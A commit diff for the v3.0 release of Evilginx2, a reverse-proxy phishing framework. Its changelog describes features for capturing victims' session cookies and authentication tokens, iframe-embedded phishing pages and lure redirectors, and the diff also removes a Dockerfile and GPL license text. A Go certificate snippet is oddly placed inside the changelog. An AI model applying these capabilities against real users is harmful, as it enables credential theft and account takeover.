v3.0 release
parent 511860ca99
commit 1ac3d10271
.gitignore (vendored): 5 changes
@@ -1,6 +1,3 @@
bin/
docs/
img/
release/
build/
phishlets/test-*
private/
CHANGELOG: 36 changes
@@ -1,4 +1,26 @@
2.4.0
# 3.0.0
- Feature: TLS certificates from LetsEncrypt will now get automatically renewed.
- Feature: Automated retrieval and renewal of LetsEncrypt TLS certificates is now managed by the `certmagic` library (see the sketch after this list).
- Feature: Authentication tokens can now be captured not only from cookies, but also from the response body and HTTP headers.
- Feature: Phishing pages can now be embedded inside iframes.
- Feature: Changed redirection after successful session capture from a `Location` header redirect to an injected JavaScript redirect.
- Feature: Changed the config file from `config.yaml` to `config.json`, permanently changing the configuration format to JSON.
- Feature: Changed the open-source license from GPL to BSD-3.
- Feature: Added an `always` modifier for capturing authentication cookies, forcing capture of a cookie even if it has no expiration time.
- Feature: Added a `phishlet <phishlet>` command to show details of a specific phishlet.
- Feature: Added phishlet templates, allowing the creation of child phishlets with custom parameters, such as a pre-configured subdomain or domain. Parameters can be defined anywhere in the phishlet file as `{param_name}`, and every occurrence will be replaced with the pre-configured parameter values of the created child phishlet.
- Feature: Added a `phishlet create` command to create child phishlets from template phishlets.
- Feature: Renamed lure `templates` to lure `redirectors` due to a name conflict with phishlet templates.
- Feature: Added `{orig_hostname}` and `{orig_domain}` support for the `sub_filters` phishlet setting.
- Feature: Added `{basedomain}` and `{basedomain_regexp}` support for the `sub_filters` phishlet setting.
- Fixed: One target can now have multiple phishing sessions active for several different phishlets.
- Fixed: Cookie capture from an HTTP response will no longer stop midway; missing `opt` cookies are ignored once all authentication cookies have been captured.
- Fixed: The `trigger_paths` regexp will now match the full string instead of triggering when only part of it is detected in the URL path.
- Fixed: Phishlet table rows are now sorted alphabetically.
- Fixed: Improved phishing session management to always create a new session when a lure URL is hit and no session cookie is present, even when an IP whitelist is set.
- Fixed: WebSocket connections are now properly proxied.
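The sketch below illustrates the kind of automatic certificate retrieval and renewal the `certmagic` library provides. It is a minimal, self-contained example with a hypothetical hostname and contact address and a plain HTTP handler; it is not the actual Evilginx integration, which wires the library into its own proxy and configuration.

```
package main

import (
	"fmt"
	"net/http"

	"github.com/caddyserver/certmagic"
)

func main() {
	// certmagic obtains a certificate from LetsEncrypt on first use and
	// keeps renewing it in the background before it expires.
	certmagic.DefaultACME.Agreed = true
	certmagic.DefaultACME.Email = "admin@example.com" // hypothetical contact address

	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "hello")
	})

	// Serves HTTPS for the listed hostnames; blocks until an error occurs.
	if err := certmagic.HTTPS([]string{"phish.example.com"}, mux); err != nil {
		panic(err)
	}
}
```
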
# 2.4.0
- Feature: Create and set up pre-phish HTML templates for your campaigns. Create your HTML file and place `{lure_url_html}` or `{lure_url_js}` in the code to manage redirection to the phishing page with any form of user interaction. Command: `lures edit <id> template <template>`.
- Feature: Create customized hostnames for every phishing lure. Command: `lures edit <id> hostname <hostname>`.
- Feature: Support for routing connections via SOCKS5 and HTTP(S) proxies. Command: `proxy`.
@@ -14,19 +36,19 @@
- Improved autofill for `lures edit` commands and switched the positions of `<id>` and the variable name.
- Increased the duration of whitelisting authorized connections for the whole IP address from 15 seconds to 10 minutes.

2.3.3
# 2.3.3
- Fixed: Multiple concurrent map writes when whitelisting IPs during heavy loads.

2.3.2
# 2.3.2
- ACMEv2 support added to comply with LetsEncrypt requirements.
- Fixed session cookie output to support EditThisCookie on the latest Chrome version.
- Increased timeouts for proxying HTTP packets to 45 seconds.
- Added support for Go modules.

2.3.1
# 2.3.1
- Redirection is now triggered only for responses with a `text/html` content-type header.

2.3.0
# 2.3.0
- The proxy can now create most of the required `sub_filters` on its own, making it much easier to create new phishlets.
- Added lures, with which you can prepare custom phishing URLs, each having its own set of unique options (`help lures` for more info).
- Added OpenGraph settings for lures, allowing you to create enticing content for link previews.
@@ -34,10 +56,10 @@
- Injected JavaScript can be customized with the values of custom parameters specified in lure options.
- Deprecated `landing_path` and replaced it with the `login` section, which contains the domain and path of the website's login page.

2.2.1
# 2.2.1
- Fixed: `type` with value `json` was not correctly activated when set under `credentials`.

2.2.0
# 2.2.0
- Now when any of the `auth_urls` is triggered, the redirection will take place AFTER response cookies for that request are captured.
- Regular expression groups now work with `sub_filters`.
- Phishlets are now listed in a table.
Dockerfile: 36 changes
@@ -1,36 +0,0 @@
FROM golang:1.13.1-alpine as build

RUN apk add --update \
    git \
    && rm -rf /var/cache/apk/*

RUN wget -O /usr/local/bin/dep https://github.com/golang/dep/releases/download/v0.5.0/dep-linux-amd64 && chmod +x /usr/local/bin/dep

WORKDIR /go/src/github.com/kgretzky/evilginx2

COPY go.mod go.sum ./

ENV GO111MODULE on

RUN go mod download

COPY . /go/src/github.com/kgretzky/evilginx2

RUN go build -o ./bin/evilginx main.go

FROM alpine:3.8

RUN apk add --update \
    ca-certificates \
    && rm -rf /var/cache/apk/*

WORKDIR /app

COPY --from=build /go/src/github.com/kgretzky/evilginx2/bin/evilginx /app/evilginx
COPY ./phishlets/*.yaml /app/phishlets/

VOLUME ["/app/phishlets/"]

EXPOSE 443 80 53/udp

ENTRYPOINT ["/app/evilginx"]
LICENSE: 622 changes
@@ -1,595 +1,27 @@
GNU General Public License
|
||||
==========================
|
||||
|
||||
_Version 3, 29 June 2007_
|
||||
_Copyright © 2007 Free Software Foundation, Inc. <<http://fsf.org/>>_
|
||||
|
||||
Everyone is permitted to copy and distribute verbatim copies of this license
|
||||
document, but changing it is not allowed.
|
||||
|
||||
## Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for software and other
|
||||
kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed to take away
|
||||
your freedom to share and change the works. By contrast, the GNU General Public
|
||||
License is intended to guarantee your freedom to share and change all versions of a
|
||||
program--to make sure it remains free software for all its users. We, the Free
|
||||
Software Foundation, use the GNU General Public License for most of our software; it
|
||||
applies also to any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not price. Our General
|
||||
Public Licenses are designed to make sure that you have the freedom to distribute
|
||||
copies of free software (and charge for them if you wish), that you receive source
|
||||
code or can get it if you want it, that you can change the software or use pieces of
|
||||
it in new free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you these rights or
|
||||
asking you to surrender the rights. Therefore, you have certain responsibilities if
|
||||
you distribute copies of the software, or if you modify it: responsibilities to
|
||||
respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether gratis or for a fee,
|
||||
you must pass on to the recipients the same freedoms that you received. You must make
|
||||
sure that they, too, receive or can get the source code. And you must show them these
|
||||
terms so they know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps: **(1)** assert
|
||||
copyright on the software, and **(2)** offer you this License giving you legal permission
|
||||
to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains that there is
|
||||
no warranty for this free software. For both users' and authors' sake, the GPL
|
||||
requires that modified versions be marked as changed, so that their problems will not
|
||||
be attributed erroneously to authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run modified versions of
|
||||
the software inside them, although the manufacturer can do so. This is fundamentally
|
||||
incompatible with the aim of protecting users' freedom to change the software. The
|
||||
systematic pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we have designed
|
||||
this version of the GPL to prohibit the practice for those products. If such problems
|
||||
arise substantially in other domains, we stand ready to extend this provision to
|
||||
those domains in future versions of the GPL, as needed to protect the freedom of
|
||||
users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents. States should
|
||||
not allow patents to restrict development and use of software on general-purpose
|
||||
computers, but in those that do, we wish to avoid the special danger that patents
|
||||
applied to a free program could make it effectively proprietary. To prevent this, the
|
||||
GPL assures that patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and modification follow.
|
||||
|
||||
## TERMS AND CONDITIONS
|
||||
|
||||
### 0. Definitions
|
||||
|
||||
“This License” refers to version 3 of the GNU General Public License.
|
||||
|
||||
“Copyright” also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
“The Program” refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as “you”. “Licensees” and
|
||||
“recipients” may be individuals or organizations.
|
||||
|
||||
To “modify” a work means to copy from or adapt all or part of the work in
|
||||
a fashion requiring copyright permission, other than the making of an exact copy. The
|
||||
resulting work is called a “modified version” of the earlier work or a
|
||||
work “based on” the earlier work.
|
||||
|
||||
A “covered work” means either the unmodified Program or a work based on
|
||||
the Program.
|
||||
|
||||
To “propagate” a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for infringement under
|
||||
applicable copyright law, except executing it on a computer or modifying a private
|
||||
copy. Propagation includes copying, distribution (with or without modification),
|
||||
making available to the public, and in some countries other activities as well.
|
||||
|
||||
To “convey” a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through a computer
|
||||
network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays “Appropriate Legal Notices” to the
|
||||
extent that it includes a convenient and prominently visible feature that **(1)**
|
||||
displays an appropriate copyright notice, and **(2)** tells the user that there is no
|
||||
warranty for the work (except to the extent that warranties are provided), that
|
||||
licensees may convey the work under this License, and how to view a copy of this
|
||||
License. If the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
### 1. Source Code
|
||||
|
||||
The “source code” for a work means the preferred form of the work for
|
||||
making modifications to it. “Object code” means any non-source form of a
|
||||
work.
|
||||
|
||||
A “Standard Interface” means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of interfaces
|
||||
specified for a particular programming language, one that is widely used among
|
||||
developers working in that language.
|
||||
|
||||
The “System Libraries” of an executable work include anything, other than
|
||||
the work as a whole, that **(a)** is included in the normal form of packaging a Major
|
||||
Component, but which is not part of that Major Component, and **(b)** serves only to
|
||||
enable use of the work with that Major Component, or to implement a Standard
|
||||
Interface for which an implementation is available to the public in source code form.
|
||||
A “Major Component”, in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system (if any) on which
|
||||
the executable work runs, or a compiler used to produce the work, or an object code
|
||||
interpreter used to run it.
|
||||
|
||||
The “Corresponding Source” for a work in object code form means all the
|
||||
source code needed to generate, install, and (for an executable work) run the object
|
||||
code and to modify the work, including scripts to control those activities. However,
|
||||
it does not include the work's System Libraries, or general-purpose tools or
|
||||
generally available free programs which are used unmodified in performing those
|
||||
activities but which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for the work, and
|
||||
the source code for shared libraries and dynamically linked subprograms that the work
|
||||
is specifically designed to require, such as by intimate data communication or
|
||||
control flow between those subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users can regenerate
|
||||
automatically from other parts of the Corresponding Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that same work.
|
||||
|
||||
### 2. Basic Permissions
|
||||
|
||||
All rights granted under this License are granted for the term of copyright on the
|
||||
Program, and are irrevocable provided the stated conditions are met. This License
|
||||
explicitly affirms your unlimited permission to run the unmodified Program. The
|
||||
output from running a covered work is covered by this License only if the output,
|
||||
given its content, constitutes a covered work. This License acknowledges your rights
|
||||
of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not convey, without
|
||||
conditions so long as your license otherwise remains in force. You may convey covered
|
||||
works to others for the sole purpose of having them make modifications exclusively
|
||||
for you, or provide you with facilities for running those works, provided that you
|
||||
comply with the terms of this License in conveying all material for which you do not
|
||||
control copyright. Those thus making or running the covered works for you must do so
|
||||
exclusively on your behalf, under your direction and control, on terms that prohibit
|
||||
them from making any copies of your copyrighted material outside their relationship
|
||||
with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under the conditions
|
||||
stated below. Sublicensing is not allowed; section 10 makes it unnecessary.
|
||||
|
||||
### 3. Protecting Users' Legal Rights From Anti-Circumvention Law
|
||||
|
||||
No covered work shall be deemed part of an effective technological measure under any
|
||||
applicable law fulfilling obligations under article 11 of the WIPO copyright treaty
|
||||
adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention
|
||||
of such measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid circumvention of
|
||||
technological measures to the extent such circumvention is effected by exercising
|
||||
rights under this License with respect to the covered work, and you disclaim any
|
||||
intention to limit operation or modification of the work as a means of enforcing,
|
||||
against the work's users, your or third parties' legal rights to forbid circumvention
|
||||
of technological measures.
|
||||
|
||||
### 4. Conveying Verbatim Copies
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you receive it, in any
|
||||
medium, provided that you conspicuously and appropriately publish on each copy an
|
||||
appropriate copyright notice; keep intact all notices stating that this License and
|
||||
any non-permissive terms added in accord with section 7 apply to the code; keep
|
||||
intact all notices of the absence of any warranty; and give all recipients a copy of
|
||||
this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey, and you may offer
|
||||
support or warranty protection for a fee.
|
||||
|
||||
### 5. Conveying Modified Source Versions
|
||||
|
||||
You may convey a work based on the Program, or the modifications to produce it from
|
||||
the Program, in the form of source code under the terms of section 4, provided that
|
||||
you also meet all of these conditions:
|
||||
|
||||
* **a)** The work must carry prominent notices stating that you modified it, and giving a
|
||||
relevant date.
|
||||
* **b)** The work must carry prominent notices stating that it is released under this
|
||||
License and any conditions added under section 7. This requirement modifies the
|
||||
requirement in section 4 to “keep intact all notices”.
|
||||
* **c)** You must license the entire work, as a whole, under this License to anyone who
|
||||
comes into possession of a copy. This License will therefore apply, along with any
|
||||
applicable section 7 additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no permission to license the
|
||||
work in any other way, but it does not invalidate such permission if you have
|
||||
separately received it.
|
||||
* **d)** If the work has interactive user interfaces, each must display Appropriate Legal
|
||||
Notices; however, if the Program has interactive interfaces that do not display
|
||||
Appropriate Legal Notices, your work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent works, which are
|
||||
not by their nature extensions of the covered work, and which are not combined with
|
||||
it such as to form a larger program, in or on a volume of a storage or distribution
|
||||
medium, is called an “aggregate” if the compilation and its resulting
|
||||
copyright are not used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work in an aggregate
|
||||
does not cause this License to apply to the other parts of the aggregate.
|
||||
|
||||
### 6. Conveying Non-Source Forms
|
||||
|
||||
You may convey a covered work in object code form under the terms of sections 4 and
|
||||
5, provided that you also convey the machine-readable Corresponding Source under the
|
||||
terms of this License, in one of these ways:
|
||||
|
||||
* **a)** Convey the object code in, or embodied in, a physical product (including a
|
||||
physical distribution medium), accompanied by the Corresponding Source fixed on a
|
||||
durable physical medium customarily used for software interchange.
|
||||
* **b)** Convey the object code in, or embodied in, a physical product (including a
|
||||
physical distribution medium), accompanied by a written offer, valid for at least
|
||||
three years and valid for as long as you offer spare parts or customer support for
|
||||
that product model, to give anyone who possesses the object code either **(1)** a copy of
|
||||
the Corresponding Source for all the software in the product that is covered by this
|
||||
License, on a durable physical medium customarily used for software interchange, for
|
||||
a price no more than your reasonable cost of physically performing this conveying of
|
||||
source, or **(2)** access to copy the Corresponding Source from a network server at no
|
||||
charge.
|
||||
* **c)** Convey individual copies of the object code with a copy of the written offer to
|
||||
provide the Corresponding Source. This alternative is allowed only occasionally and
|
||||
noncommercially, and only if you received the object code with such an offer, in
|
||||
accord with subsection 6b.
|
||||
* **d)** Convey the object code by offering access from a designated place (gratis or for
|
||||
a charge), and offer equivalent access to the Corresponding Source in the same way
|
||||
through the same place at no further charge. You need not require recipients to copy
|
||||
the Corresponding Source along with the object code. If the place to copy the object
|
||||
code is a network server, the Corresponding Source may be on a different server
|
||||
(operated by you or a third party) that supports equivalent copying facilities,
|
||||
provided you maintain clear directions next to the object code saying where to find
|
||||
the Corresponding Source. Regardless of what server hosts the Corresponding Source,
|
||||
you remain obligated to ensure that it is available for as long as needed to satisfy
|
||||
these requirements.
|
||||
* **e)** Convey the object code using peer-to-peer transmission, provided you inform
|
||||
other peers where the object code and Corresponding Source of the work are being
|
||||
offered to the general public at no charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded from the
|
||||
Corresponding Source as a System Library, need not be included in conveying the
|
||||
object code work.
|
||||
|
||||
A “User Product” is either **(1)** a “consumer product”, which
|
||||
means any tangible personal property which is normally used for personal, family, or
|
||||
household purposes, or **(2)** anything designed or sold for incorporation into a
|
||||
dwelling. In determining whether a product is a consumer product, doubtful cases
|
||||
shall be resolved in favor of coverage. For a particular product received by a
|
||||
particular user, “normally used” refers to a typical or common use of
|
||||
that class of product, regardless of the status of the particular user or of the way
|
||||
in which the particular user actually uses, or expects or is expected to use, the
|
||||
product. A product is a consumer product regardless of whether the product has
|
||||
substantial commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
“Installation Information” for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install and execute
|
||||
modified versions of a covered work in that User Product from a modified version of
|
||||
its Corresponding Source. The information must suffice to ensure that the continued
|
||||
functioning of the modified object code is in no case prevented or interfered with
|
||||
solely because modification has been made.
|
||||
|
||||
If you convey an object code work under this section in, or with, or specifically for
|
||||
use in, a User Product, and the conveying occurs as part of a transaction in which
|
||||
the right of possession and use of the User Product is transferred to the recipient
|
||||
in perpetuity or for a fixed term (regardless of how the transaction is
|
||||
characterized), the Corresponding Source conveyed under this section must be
|
||||
accompanied by the Installation Information. But this requirement does not apply if
|
||||
neither you nor any third party retains the ability to install modified object code
|
||||
on the User Product (for example, the work has been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a requirement to
|
||||
continue to provide support service, warranty, or updates for a work that has been
|
||||
modified or installed by the recipient, or for the User Product in which it has been
|
||||
modified or installed. Access to a network may be denied when the modification itself
|
||||
materially and adversely affects the operation of the network or violates the rules
|
||||
and protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided, in accord with
|
||||
this section must be in a format that is publicly documented (and with an
|
||||
implementation available to the public in source code form), and must require no
|
||||
special password or key for unpacking, reading or copying.
|
||||
|
||||
### 7. Additional Terms
|
||||
|
||||
“Additional permissions” are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions. Additional
|
||||
permissions that are applicable to the entire Program shall be treated as though they
|
||||
were included in this License, to the extent that they are valid under applicable
|
||||
law. If additional permissions apply only to part of the Program, that part may be
|
||||
used separately under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option remove any
|
||||
additional permissions from that copy, or from any part of it. (Additional
|
||||
permissions may be written to require their own removal in certain cases when you
|
||||
modify the work.) You may place additional permissions on material, added by you to a
|
||||
covered work, for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you add to a
|
||||
covered work, you may (if authorized by the copyright holders of that material)
|
||||
supplement the terms of this License with terms:
|
||||
|
||||
* **a)** Disclaiming warranty or limiting liability differently from the terms of
|
||||
sections 15 and 16 of this License; or
|
||||
* **b)** Requiring preservation of specified reasonable legal notices or author
|
||||
attributions in that material or in the Appropriate Legal Notices displayed by works
|
||||
containing it; or
|
||||
* **c)** Prohibiting misrepresentation of the origin of that material, or requiring that
|
||||
modified versions of such material be marked in reasonable ways as different from the
|
||||
original version; or
|
||||
* **d)** Limiting the use for publicity purposes of names of licensors or authors of the
|
||||
material; or
|
||||
* **e)** Declining to grant rights under trademark law for use of some trade names,
|
||||
trademarks, or service marks; or
|
||||
* **f)** Requiring indemnification of licensors and authors of that material by anyone
|
||||
who conveys the material (or modified versions of it) with contractual assumptions of
|
||||
liability to the recipient, for any liability that these contractual assumptions
|
||||
directly impose on those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered “further
|
||||
restrictions” within the meaning of section 10. If the Program as you received
|
||||
it, or any part of it, contains a notice stating that it is governed by this License
|
||||
along with a term that is a further restriction, you may remove that term. If a
|
||||
license document contains a further restriction but permits relicensing or conveying
|
||||
under this License, you may add to a covered work material governed by the terms of
|
||||
that license document, provided that the further restriction does not survive such
|
||||
relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you must place, in
|
||||
the relevant source files, a statement of the additional terms that apply to those
|
||||
files, or a notice indicating where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the form of a
|
||||
separately written license, or stated as exceptions; the above requirements apply
|
||||
either way.
|
||||
|
||||
### 8. Termination
|
||||
|
||||
You may not propagate or modify a covered work except as expressly provided under
|
||||
this License. Any attempt otherwise to propagate or modify it is void, and will
|
||||
automatically terminate your rights under this License (including any patent licenses
|
||||
granted under the third paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your license from a
|
||||
particular copyright holder is reinstated **(a)** provisionally, unless and until the
|
||||
copyright holder explicitly and finally terminates your license, and **(b)** permanently,
|
||||
if the copyright holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is reinstated permanently
|
||||
if the copyright holder notifies you of the violation by some reasonable means, this
|
||||
is the first time you have received notice of violation of this License (for any
|
||||
work) from that copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the licenses of
|
||||
parties who have received copies or rights from you under this License. If your
|
||||
rights have been terminated and not permanently reinstated, you do not qualify to
|
||||
receive new licenses for the same material under section 10.
|
||||
|
||||
### 9. Acceptance Not Required for Having Copies
|
||||
|
||||
You are not required to accept this License in order to receive or run a copy of the
|
||||
Program. Ancillary propagation of a covered work occurring solely as a consequence of
|
||||
using peer-to-peer transmission to receive a copy likewise does not require
|
||||
acceptance. However, nothing other than this License grants you permission to
|
||||
propagate or modify any covered work. These actions infringe copyright if you do not
|
||||
accept this License. Therefore, by modifying or propagating a covered work, you
|
||||
indicate your acceptance of this License to do so.
|
||||
|
||||
### 10. Automatic Licensing of Downstream Recipients
|
||||
|
||||
Each time you convey a covered work, the recipient automatically receives a license
|
||||
from the original licensors, to run, modify and propagate that work, subject to this
|
||||
License. You are not responsible for enforcing compliance by third parties with this
|
||||
License.
|
||||
|
||||
An “entity transaction” is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an organization, or
|
||||
merging organizations. If propagation of a covered work results from an entity
|
||||
transaction, each party to that transaction who receives a copy of the work also
|
||||
receives whatever licenses to the work the party's predecessor in interest had or
|
||||
could give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if the predecessor
|
||||
has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the rights granted or
|
||||
affirmed under this License. For example, you may not impose a license fee, royalty,
|
||||
or other charge for exercise of rights granted under this License, and you may not
|
||||
initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging
|
||||
that any patent claim is infringed by making, using, selling, offering for sale, or
|
||||
importing the Program or any portion of it.
|
||||
|
||||
### 11. Patents
|
||||
|
||||
A “contributor” is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The work thus
|
||||
licensed is called the contributor's “contributor version”.
|
||||
|
||||
A contributor's “essential patent claims” are all patent claims owned or
|
||||
controlled by the contributor, whether already acquired or hereafter acquired, that
|
||||
would be infringed by some manner, permitted by this License, of making, using, or
|
||||
selling its contributor version, but do not include claims that would be infringed
|
||||
only as a consequence of further modification of the contributor version. For
|
||||
purposes of this definition, “control” includes the right to grant patent
|
||||
sublicenses in a manner consistent with the requirements of this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free patent license
|
||||
under the contributor's essential patent claims, to make, use, sell, offer for sale,
|
||||
import and otherwise run, modify and propagate the contents of its contributor
|
||||
version.
|
||||
|
||||
In the following three paragraphs, a “patent license” is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent (such as an
|
||||
express permission to practice a patent or covenant not to sue for patent
|
||||
infringement). To “grant” such a patent license to a party means to make
|
||||
such an agreement or commitment not to enforce a patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license, and the
|
||||
Corresponding Source of the work is not available for anyone to copy, free of charge
|
||||
and under the terms of this License, through a publicly available network server or
|
||||
other readily accessible means, then you must either **(1)** cause the Corresponding
|
||||
Source to be so available, or **(2)** arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or **(3)** arrange, in a manner consistent with
|
||||
the requirements of this License, to extend the patent license to downstream
|
||||
recipients. “Knowingly relying” means you have actual knowledge that, but
|
||||
for the patent license, your conveying the covered work in a country, or your
|
||||
recipient's use of the covered work in a country, would infringe one or more
|
||||
identifiable patents in that country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or arrangement, you
|
||||
convey, or propagate by procuring conveyance of, a covered work, and grant a patent
|
||||
license to some of the parties receiving the covered work authorizing them to use,
|
||||
propagate, modify or convey a specific copy of the covered work, then the patent
|
||||
license you grant is automatically extended to all recipients of the covered work and
|
||||
works based on it.
|
||||
|
||||
A patent license is “discriminatory” if it does not include within the
|
||||
scope of its coverage, prohibits the exercise of, or is conditioned on the
|
||||
non-exercise of one or more of the rights that are specifically granted under this
|
||||
License. You may not convey a covered work if you are a party to an arrangement with
|
||||
a third party that is in the business of distributing software, under which you make
|
||||
payment to the third party based on the extent of your activity of conveying the
|
||||
work, and under which the third party grants, to any of the parties who would receive
|
||||
the covered work from you, a discriminatory patent license **(a)** in connection with
|
||||
copies of the covered work conveyed by you (or copies made from those copies), or **(b)**
|
||||
primarily for and in connection with specific products or compilations that contain
|
||||
the covered work, unless you entered into that arrangement, or that patent license
|
||||
was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting any implied
|
||||
license or other defenses to infringement that may otherwise be available to you
|
||||
under applicable patent law.
|
||||
|
||||
### 12. No Surrender of Others' Freedom
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or otherwise)
|
||||
that contradict the conditions of this License, they do not excuse you from the
|
||||
conditions of this License. If you cannot convey a covered work so as to satisfy
|
||||
simultaneously your obligations under this License and any other pertinent
|
||||
obligations, then as a consequence you may not convey it at all. For example, if you
|
||||
agree to terms that obligate you to collect a royalty for further conveying from
|
||||
those to whom you convey the Program, the only way you could satisfy both those terms
|
||||
and this License would be to refrain entirely from conveying the Program.
|
||||
|
||||
### 13. Use with the GNU Affero General Public License
|
||||
|
||||
Notwithstanding any other provision of this License, you have permission to link or
|
||||
combine any covered work with a work licensed under version 3 of the GNU Affero
|
||||
General Public License into a single combined work, and to convey the resulting work.
|
||||
The terms of this License will continue to apply to the part which is the covered
|
||||
work, but the special requirements of the GNU Affero General Public License, section
|
||||
13, concerning interaction through a network will apply to the combination as such.
|
||||
|
||||
### 14. Revised Versions of this License
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of the GNU
|
||||
General Public License from time to time. Such new versions will be similar in spirit
|
||||
to the present version, but may differ in detail to address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the Program specifies that
|
||||
a certain numbered version of the GNU General Public License “or any later
|
||||
version” applies to it, you have the option of following the terms and
|
||||
conditions either of that numbered version or of any later version published by the
|
||||
Free Software Foundation. If the Program does not specify a version number of the GNU
|
||||
General Public License, you may choose any version ever published by the Free
|
||||
Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future versions of the GNU
|
||||
General Public License can be used, that proxy's public statement of acceptance of a
|
||||
version permanently authorizes you to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different permissions. However, no
|
||||
additional obligations are imposed on any author or copyright holder as a result of
|
||||
your choosing to follow a later version.
|
||||
|
||||
### 15. Disclaimer of Warranty
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
|
||||
EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
|
||||
PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER
|
||||
EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
|
||||
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE
|
||||
QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE
|
||||
DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
### 16. Limitation of Liability
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY
|
||||
COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS
|
||||
PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,
|
||||
INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
|
||||
PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE
|
||||
OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE
|
||||
WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
|
||||
POSSIBILITY OF SUCH DAMAGES.
|
||||
|
||||
### 17. Interpretation of Sections 15 and 16
